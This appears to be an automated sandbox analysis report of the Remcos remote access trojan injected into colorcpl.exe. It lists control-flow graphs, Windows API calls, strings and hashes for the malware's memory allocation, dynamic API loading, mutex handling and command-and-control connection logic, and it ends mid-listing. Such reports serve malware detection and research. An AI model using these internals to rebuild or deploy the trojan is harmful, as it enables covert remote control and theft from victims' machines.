                                        control_flow_graph 1158 68d1117-68d1144 1159 68d1149-68d11b7 1158->1159 1159->1159 1160 68d11bd-68d11fd call 68d1512 1159->1160 1165 68d1508-68d150f 1160->1165 1166 68d1203-68d1226 1160->1166 1166->1165 1168 68d122c-68d124c 1166->1168 1168->1165 1170 68d1252-68d1272 1168->1170 1170->1165 1172 68d1278-68d12a6 VirtualAlloc 1170->1172 1173 68d12a8-68d12b5 VirtualAlloc 1172->1173 1174 68d12bb-68d12de 1172->1174 1173->1165 1173->1174 1175 68d12e2-68d12f1 1174->1175 1176 68d1307-68d1308 1175->1176 1177 68d12f3-68d1306 1175->1177 1176->1175 1178 68d130a-68d1310 1176->1178 1177->1176 1179 68d136e-68d1382 GetPEB 1178->1179 1180 68d1312-68d1322 1178->1180 1181 68d1384 1179->1181 1182 68d1387-68d138d 1179->1182 1180->1179 1183 68d1324 1180->1183 1181->1182 1184 68d138f-68d1395 1182->1184 1185 68d1326-68d132b 1183->1185 1186 68d13be-68d13c0 1184->1186 1187 68d1397-68d139d 1184->1187 1185->1179 1188 68d132d-68d1332 1185->1188 1191 68d13c6-68d13ce 1186->1191 1192 68d13c2-68d13c4 1186->1192 1187->1186 1189 68d139f-68d13a5 1187->1189 1190 68d1335-68d134c 1188->1190 1189->1186 1193 68d13a7-68d13bc 1189->1193 1194 68d134e-68d1353 1190->1194 1195 68d1355-68d1356 1190->1195 1196 68d143c-68d1449 GetPEB 1191->1196 1197 68d13d0-68d13d3 1191->1197 1192->1184 1193->1191 1198 68d135b-68d135e 1194->1198 1201 68d1358 1195->1201 1202 68d1360-68d1361 1195->1202 1199 68d144c-68d1452 1196->1199 1200 68d13d5-68d13da 1197->1200 1205 68d1365-68d1367 1198->1205 1203 68d1458-68d1462 1199->1203 1204 68d14f4-68d14f9 1199->1204 1200->1196 1207 68d13dc-68d13e8 1200->1207 1201->1198 1202->1205 1206 68d1363 1202->1206 1203->1204 1215 68d1468-68d1475 1203->1215 1204->1199 1208 68d14ff-68d1505 1204->1208 1205->1190 1209 68d1369-68d136c 1205->1209 1206->1205 1210 68d13ed-68d13fc LoadLibraryA 1207->1210 1211 68d13ea 1207->1211 1208->1165 1209->1185 1210->1165 1212 68d1402 1210->1212 1211->1210 1214 68d1404-68d140b 1212->1214 1217 68d140d-68d1413 1214->1217 1218 68d1437-68d143a 1214->1218 1215->1204 1216 68d1477 1215->1216 1219 68d1479-68d1482 1216->1219 1220 68d141d-68d1420 1217->1220 1221 68d1415-68d141b 1217->1221 1218->1200 1219->1204 1222 68d1484-68d148f 1219->1222 1223 68d1421-68d1435 1220->1223 1221->1223 1224 68d1496-68d1499 1222->1224 1225 68d1491-68d1494 1222->1225 1223->1214 1224->1219 1225->1224 1226 68d149b-68d14c2 1225->1226 1226->1204 1230 68d14c4-68d14c5 1226->1230 1231 68d14c7-68d14ca 1230->1231 1232 68d14cc-68d14d3 1231->1232 1233 68d14d5-68d14f2 1231->1233 1232->1231 1233->1224
                                        APIs
                                        • VirtualAlloc.KERNEL32(?,?,00003000,00000040,?,?,?,?,00000000,?,?,?,00000000), ref: 068D12A1
                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040,?,?,00000000,?,?,?,00000000,?,?,?,00007463), ref: 068D12B1
                                        • LoadLibraryA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,?,?,00007463,?,?,?,00000000), ref: 068D13F8
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 2441068224-0
                                        • Opcode ID: bd8075dc6991ca337bed542f03690e9814ab4de7dc4771d535a4c61e653253e1
                                        • Instruction ID: bb458d503548e705aec7de273ca164341b5fa57b252bfe1fea26c6958e619fbb
                                        • Opcode Fuzzy Hash: bd8075dc6991ca337bed542f03690e9814ab4de7dc4771d535a4c61e653253e1
                                        • Instruction Fuzzy Hash: 09D1AE71E00215AFDB64CFA8CC88BAEB7B6FF44714F188169E945EB645D774E900CBA0
                                        Function 04AB15EC Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1243 4ab15ec-4ab1606 CryptAcquireContextA 1244 4ab1608 1243->1244 1245 4ab160d-4ab161c CryptGenRandom 1243->1245 1246 4ab160a-4ab160b 1244->1246 1247 4ab161e-4ab1620 1245->1247 1248 4ab1622-4ab162c CryptReleaseContext 1245->1248 1249 4ab162e-4ab1630 1246->1249 1247->1246 1248->1249
                                        APIs
                                        • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,04AB1274,00000034,?,?,02B045E0), ref: 04AB15FE
                                        • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,04AB1307,00000000,?,00000000), ref: 04AB1614
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,04AB1307,00000000,?,00000000,04A9C006), ref: 04AB1626
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease
                                        • String ID:
                                        • API String ID: 1815803762-0
                                        • Opcode ID: 4d367a567dd1881b1fb81310cc45897193d22ec98fa2da3d85bef428bb48f6c0
                                        • Instruction ID: 9efd2c192e5655960b3920f5d39462ef55612d779ab4e454640b7bbbbfcc9fde
                                        • Opcode Fuzzy Hash: 4d367a567dd1881b1fb81310cc45897193d22ec98fa2da3d85bef428bb48f6c0
                                        • Instruction Fuzzy Hash: 66E09231308210BAFB300F11AC28F962A69EB857A1F244628F193E40D4D6555C018698
                                        Function 04A995F8 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetUserNameW.ADVAPI32(?,00000010), ref: 04A9962D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: NameUser
                                        • String ID:
                                        • API String ID: 2645101109-0
                                        • Opcode ID: 01451ab717d19f7cbe0fead9fb86ab822bf256cb4a4831c62721c1d60552aa0e
                                        • Instruction ID: 4644ac6dffc53bed0267beecf21ab390c20f77c6bbea419115c8dc71bd787cf8
                                        • Opcode Fuzzy Hash: 01451ab717d19f7cbe0fead9fb86ab822bf256cb4a4831c62721c1d60552aa0e
                                        • Instruction Fuzzy Hash: 3C01FF7290011DABDB04FBD4DD45EEEB7BCEF44314F10015AA505A6194EE746E89CB94
                                        Function 04AA4A66 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: recv
                                        • String ID:
                                        • API String ID: 1507349165-0
                                        • Opcode ID: cb47d038f13f7b22b008e41a6301f959c1324b032558071d1b86d40276ae304a
                                        • Instruction ID: 07cef0e031c5075556892c58ad7e4a67e14cd63a850dfa11dc297795937ee374
                                        • Opcode Fuzzy Hash: cb47d038f13f7b22b008e41a6301f959c1324b032558071d1b86d40276ae304a
                                        • Instruction Fuzzy Hash: A9B092FA21A202BF8A061B60C9048BA7EBAEBC8380B00881CB14740120D6368850AB21
                                        Function 04A9A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A8EF
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A8F8
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A90F
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A912
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A924
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A927
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A93D
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A940
                                        • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,04A8D40C), ref: 04A9A951
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A954
                                        • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,04A8D40C), ref: 04A9A969
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A96C
                                        • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,04A8D40C), ref: 04A9A97D
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A980
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,04A8D40C), ref: 04A9A98C
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A98F
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,04A8D40C), ref: 04A9A9A1
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9A4
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,04A8D40C), ref: 04A9A9B1
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9B4
                                        • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,04A8D40C), ref: 04A9A9C5
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9C8
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,04A8D40C), ref: 04A9A9D5
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9D8
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,04A8D40C), ref: 04A9A9EA
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9ED
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,04A8D40C), ref: 04A9A9FA
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9A9FD
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,04A8D40C), ref: 04A9AA0A
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA0D
                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,04A8D40C), ref: 04A9AA1F
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA22
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,04A8D40C), ref: 04A9AA30
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA33
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,04A8D40C), ref: 04A9AA40
                                        • GetProcAddress.KERNEL32(00000000), ref: 04A9AA43
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                        • API String ID: 551388010-2474455403
                                        • Opcode ID: 79b92b12623695bb2207a99245ddde3d7fafe257bee5c2bb120a46ddd8993651
                                        • Instruction ID: 4c1b56edf44a5e4caba94b945334ffa9ce89632e0ef126e58060a22ba736899b
                                        • Opcode Fuzzy Hash: 79b92b12623695bb2207a99245ddde3d7fafe257bee5c2bb120a46ddd8993651
                                        • Instruction Fuzzy Hash: 4631F8F0E4035CBBDA10BBF76C49D7B3E9CFA506947810616B625D3610EAB9BC028E64
                                        Function 04A8D3F0 Relevance: 51.5, APIs: 17, Strings: 12, Instructions: 774COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 7 4a8d3f0-4a8d45f call 4a9a8da call 4a8dd83 call 4a820d6 * 2 call 4a99d87 call 4a8e563 call 4a81e6d call 4aba300 24 4a8d4b8-4a8d57f call 4a81e45 call 4a81f8b call 4a81e45 call 4a852fe call 4a88209 call 4a81fc2 call 4a81fb8 * 2 call 4a81e45 call 4a81fa0 call 4a85a86 call 4a81e45 call 4a851c3 call 4a81e45 call 4a851c3 7->24 25 4a8d461-4a8d4b5 call 4a8e609 call 4a81e45 call 4a81f8b call 4a8f98d call 4a8e5ba call 4a8dd70 call 4a81fb8 7->25 70 4a8d5cf-4a8d5ea call 4a81e45 call 4a8fbab 24->70 71 4a8d581-4a8d5c9 call 4a8822a call 4a81fc2 call 4a81fb8 call 4a81f8b call 4a91f34 24->71 80 4a8d5ec-4a8d60d call 4a81e45 call 4a81f8b OpenMutexA 70->80 81 4a8d656-4a8d679 call 4a81f8b CreateMutexA GetLastError 70->81 71->70 105 4a8dd0f-4a8dd27 call 4a81f8b call 4a9239a call 4a90eda 71->105 98 4a8d60f-4a8d61c WaitForSingleObject CloseHandle 80->98 99 4a8d622-4a8d63f call 4a81f8b call 4a91f34 80->99 90 4a8d67f-4a8d686 81->90 91 4a8d991-4a8d99a call 4a81fb8 81->91 93 4a8d688 90->93 94 4a8d68a-4a8d6a7 GetModuleFileNameW call 4a992ae 90->94 107 4a8d9a1-4a8da01 call 4ab4c30 call 4a8245c call 4a81f8b * 2 call 4a920e8 call 4a88093 91->107 93->94 108 4a8d6a9-4a8d6ab 94->108 109 4a8d6b0-4a8d6b4 94->109 98->99 125 4a8d651 99->125 126 4a8d641-4a8d650 call 4a81f8b call 4a9239a 99->126 134 4a8dd2c 105->134 177 4a8da06-4a8da5f call 4a81e45 call 4a81f8b call 4a82073 call 4a81f8b call 4a9215f call 4a81e45 call 4a81f8b call 4ab9867 107->177 108->109 114 4a8d6b6-4a8d6c9 call 4a81e45 call 4a81f8b 109->114 115 4a8d717-4a8d72a call 4a81e45 call 4a81f8b 109->115 114->115 139 4a8d6cb-4a8d6d1 114->139 141 4a8d72c call 4a8e501 115->141 142 4a8d731-4a8d7ad call 4a81e45 call 4a81f8b call 4a88093 call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b 115->142 125->81 126->125 140 4a8dd31-4a8dd65 call 4a82073 call 4a852dd call 4a82073 call 4a994da call 4a81fb8 134->140 139->115 146 4a8d6d3-4a8d6d9 139->146 189 4a8dd6a-4a8dd6f call 4a93980 140->189 141->142 216 4a8d7af-4a8d7c8 call 4a81e45 call 4a81f8b call 4ab9891 142->216 217 4a8d815-4a8d819 142->217 151 4a8d6db-4a8d6ee call 4a860ea 146->151 152 4a8d6f7-4a8d710 call 4a81f8b call 4a91eea 146->152 151->115 167 4a8d6f0-4a8d6f5 call 4a867a0 151->167 152->115 175 4a8d712 call 4a866a6 152->175 167->115 175->115 221 4a8da61-4a8da63 177->221 222 4a8da65-4a8da67 177->222 216->217 249 4a8d7ca-4a8d810 call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a8c5ed call 4a81ef3 call 4a81ee9 216->249 217->107 220 4a8d81f-4a8d826 217->220 224 4a8d828-4a8d8a5 call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a8b871 220->224 225 4a8d8a7-4a8d8b1 call 4a88093 220->225 228 4a8da6b-4a8da7c call 4a9aa4f CreateThread 221->228 226 4a8da69 222->226 227 4a8da7e-4a8db48 call 4a82073 * 2 call 4a994da call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4ab9867 call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a88f1f call 4a81e45 call 4a81f8b 222->227 234 4a8d8b6-4a8d8de call 4a8245c call 4ab254d 224->234 225->234 226->228 349 4a8db4a-4a8db81 call 4ab229f call 4a81e45 call 4a81f8b CreateThread 227->349 350 4a8db83-4a8db9a call 4a81e45 call 4a81f8b 227->350 228->227 255 4a8d8f0 234->255 256 4a8d8e0-4a8d8ee call 4ab4c30 234->256 249->217 263 4a8d8f2-4a8d93d call 4a81ee4 call 4aba796 call 4a8245c call 4a81f8b call 4a8245c call 4a81f8b call 4a92338 255->263 256->263 317 4a8d942-4a8d967 call 4ab2556 call 4a81e45 call 4a8fbab 263->317 317->177 332 4a8d96d-4a8d98c call 4a81e45 call 4a99bca call 4a8de34 317->332 332->177 346 4a8d98e-4a8d990 332->346 346->91 349->350 359 4a8dbd9-4a8dbeb call 4a81e45 call 4a81f8b 350->359 360 4a8db9c-4a8dbd4 call 4ab229f call 4a81e45 call 4a81f8b CreateThread 350->360 372 4a8dc4c-4a8dc5e call 4a81e45 call 4a81f8b 359->372 373 4a8dbed-4a8dc47 call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a8c5a1 call 4a81ef3 call 4a81ee9 CreateThread 359->373 360->359 384 4a8dc99-4a8dcbf call 4a995f8 call 4a81ef3 call 4a81ee9 372->384 385 4a8dc60-4a8dc94 call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4ab9867 call 4a8b0a3 372->385 373->372 404 4a8dcc1-4a8dcc2 SetProcessDEPPolicy 384->404 405 4a8dcc4-4a8dcd7 CreateThread 384->405 385->384 404->405 408 4a8dcd9-4a8dce3 CreateThread 405->408 409 4a8dce5-4a8dcec 405->409 408->409 412 4a8dcfa-4a8dd01 409->412 413 4a8dcee-4a8dcf8 CreateThread 409->413 412->134 416 4a8dd03-4a8dd06 412->416 413->412 416->189 419 4a8dd08-4a8dd0d 416->419 419->140
                                        APIs
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A8EF
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A8F8
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,04A8D40C), ref: 04A9A90F
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A912
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A924
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A927
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,04A8D40C), ref: 04A9A93D
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A940
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,04A8D40C), ref: 04A9A951
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A954
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,04A8D40C), ref: 04A9A969
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A96C
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,04A8D40C), ref: 04A9A97D
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A980
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,04A8D40C), ref: 04A9A98C
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A98F
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,04A8D40C), ref: 04A9A9A1
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9A4
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,04A8D40C), ref: 04A9A9B1
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9B4
                                          • Part of subcall function 04A9A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,04A8D40C), ref: 04A9A9C5
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9C8
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,04A8D40C), ref: 04A9A9D5
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9D8
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,04A8D40C), ref: 04A9A9EA
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9ED
                                          • Part of subcall function 04A9A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,04A8D40C), ref: 04A9A9FA
                                          • Part of subcall function 04A9A8DA: GetProcAddress.KERNEL32(00000000), ref: 04A9A9FD
                                        • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 04A8D603
                                          • Part of subcall function 04A8F98D: __EH_prolog.LIBCMT ref: 04A8F992
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                        • String ID: Access Level: $Administrator$C:\Windows\SysWOW64\colorcpl.exe$Exe$Inj$Remcos Agent initialized$Software\$User$exepath$licence$license_code.txt$origmsc
                                        • API String ID: 1529173511-3534803471
                                        • Opcode ID: bd877cf4044d4c85041fb9b3d4ccb04f963089c93171ae573c3db7c4e7702993
                                        • Instruction ID: f1e2699ef69e853d9ba7378ca7677acfc468db392665c2d8b1586f89bf8f732d
                                        • Opcode Fuzzy Hash: bd877cf4044d4c85041fb9b3d4ccb04f963089c93171ae573c3db7c4e7702993
                                        • Instruction Fuzzy Hash: A422E571B443446FFE197BB45E65B7E2699DF81608F00086EF6429F2C1EE69BD0383A1
                                        Function 04A93980 Relevance: 32.3, APIs: 5, Strings: 13, Instructions: 785sleepnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 420 4a93980-4a939c8 call 4a820bf call 4a99894 call 4a820bf call 4a81e45 call 4a81f8b call 4ab9867 433 4a939ca-4a939d1 Sleep 420->433 434 4a939d7-4a93a23 call 4a82073 call 4a81e45 call 4a820d6 call 4a99d87 call 4a8487e call 4a81e45 call 4a8fbab 420->434 433->434 449 4a93a25-4a93a94 call 4a81e45 call 4a8245c call 4a81e45 call 4a81f8b call 4a81e45 call 4a8245c call 4a81e45 call 4a81f8b call 4a81e45 call 4a8245c call 4a81e45 call 4a81f8b call 4a8471d 434->449 450 4a93a97-4a93b32 call 4a82073 call 4a81e45 call 4a820d6 call 4a99d87 call 4a81e45 * 2 call 4a8822a call 4a82ef0 call 4a81fc2 call 4a81fb8 * 2 call 4a81e45 call 4a85ae5 434->450 449->450 503 4a93b42-4a93b49 450->503 504 4a93b34-4a93b40 450->504 505 4a93b4e-4a93be0 call 4a85a86 call 4a852fe call 4a88209 call 4a82ef0 call 4a82073 call 4a994da call 4a81fb8 * 2 call 4a81e45 call 4a81f8b call 4a81e45 call 4a81f8b call 4a9393f 503->505 504->505 532 4a93c2b-4a93c39 call 4a8480d 505->532 533 4a93be2-4a93c26 WSAGetLastError call 4a9a86b call 4a852dd call 4a82073 call 4a994da call 4a81fb8 505->533 539 4a93c3b-4a93c61 call 4a82073 * 2 call 4a994da 532->539 540 4a93c66-4a93c74 call 4a84f31 call 4a848a8 532->540 556 4a94493-4a944a5 call 4a84e06 call 4a821da 533->556 539->556 551 4a93c79-4a93c7b 540->551 555 4a93c81-4a93dd4 call 4a81e45 * 2 call 4a852fe call 4a88209 call 4a82ef0 call 4a88209 call 4a82ef0 call 4a82073 call 4a994da call 4a81fb8 * 4 call 4a997c1 call 4a93013 call 4a88098 call 4abf34f call 4a81e45 call 4a820d6 call 4a8245c call 4a81f8b * 2 call 4a920e8 551->555 551->556 620 4a93de8-4a93e0f call 4a81f8b call 4a91f91 555->620 621 4a93dd6-4a93de3 call 4a85a86 555->621 568 4a944cd-4a944d5 call 4a81e6d 556->568 569 4a944a7-4a944c7 call 4a81e45 call 4a81f8b call 4ab9867 Sleep 556->569 568->450 569->568 627 4a93e11-4a93e13 620->627 628 4a93e16-4a94406 call 4a8415e call 4a99c8a call 4a99b16 call 4a81e45 GetTickCount call 4a99b16 call 4a99ac6 call 4a99b16 call 4a99a77 call 4a99c8a * 5 call 4a8e2bb call 4a99c8a call 4a82f11 call 4a82e81 call 4a82ef0 call 4a82e81 call 4a82ef0 * 3 call 4a82e81 call 4a82ef0 call 4a88209 call 4a82ef0 call 4a88209 call 4a82ef0 call 4a82e81 call 4a82ef0 call 4a82e81 call 4a82ef0 call 4a82e81 call 4a82ef0 call 4a82e81 call 4a82ef0 call 4a8826c call 4a82ef0 call 4a82e81 call 4a82ef0 call 4a82e81 call 4a82ef0 call 4a88209 call 4a82ef0 * 5 call 4a82e81 call 4a82ef0 call 4a82e81 call 4a82ef0 * 6 call 4a84a81 call 4a81fb8 * 48 call 4a81ee9 call 4a81fb8 * 4 call 4a81ee9 call 4a84bf0 620->628 621->620 627->628 856 4a94408-4a9440f 628->856 857 4a9441a-4a94421 628->857 856->857 858 4a94411-4a94413 856->858 859 4a9442d-4a9445f call 4a85a4b call 4a82073 * 2 call 4a994da 857->859 860 4a94423-4a94428 call 4a89f9a 857->860 858->857 871 4a94461-4a9446d CreateThread 859->871 872 4a94473-4a9448e call 4a81fb8 * 2 call 4a81ee9 859->872 860->859 871->872 872->556
                                        APIs
                                        • Sleep.KERNEL32(00000000,00000029,76230F10,04AF1FFC,00000000), ref: 04A939D1
                                        • WSAGetLastError.WS2_32(00000000,00000001), ref: 04A93BE2
                                        • Sleep.KERNEL32(00000000,00000002), ref: 04A944C7
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$ErrorLastLocalTime
                                        • String ID: | $%I64u$3.8.0 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                        • API String ID: 524882891-3810641973
                                        • Opcode ID: fa9d7d385c071e45082136694c35450eb419c5fc1a594e36677d49e4647fcc4c
                                        • Instruction ID: ab7b5af1d0c6f4e9e74eefbd49cd0b010279e123e4a213a83edaa9abb9e8f7a5
                                        • Opcode Fuzzy Hash: fa9d7d385c071e45082136694c35450eb419c5fc1a594e36677d49e4647fcc4c
                                        • Instruction Fuzzy Hash: F3425C72A001145BFB18F764EE91AFEB3B9EF94208F5041EEE40A661D1EF307E46CA55
                                        Function 04A848A8 Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 144networkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • connect.WS2_32(?,?,?), ref: 04A848C0
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04A849E0
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 04A849EE
                                        • WSAGetLastError.WS2_32 ref: 04A84A01
                                          • Part of subcall function 04A994DA: GetLocalTime.KERNEL32(00000000), ref: 04A994F4
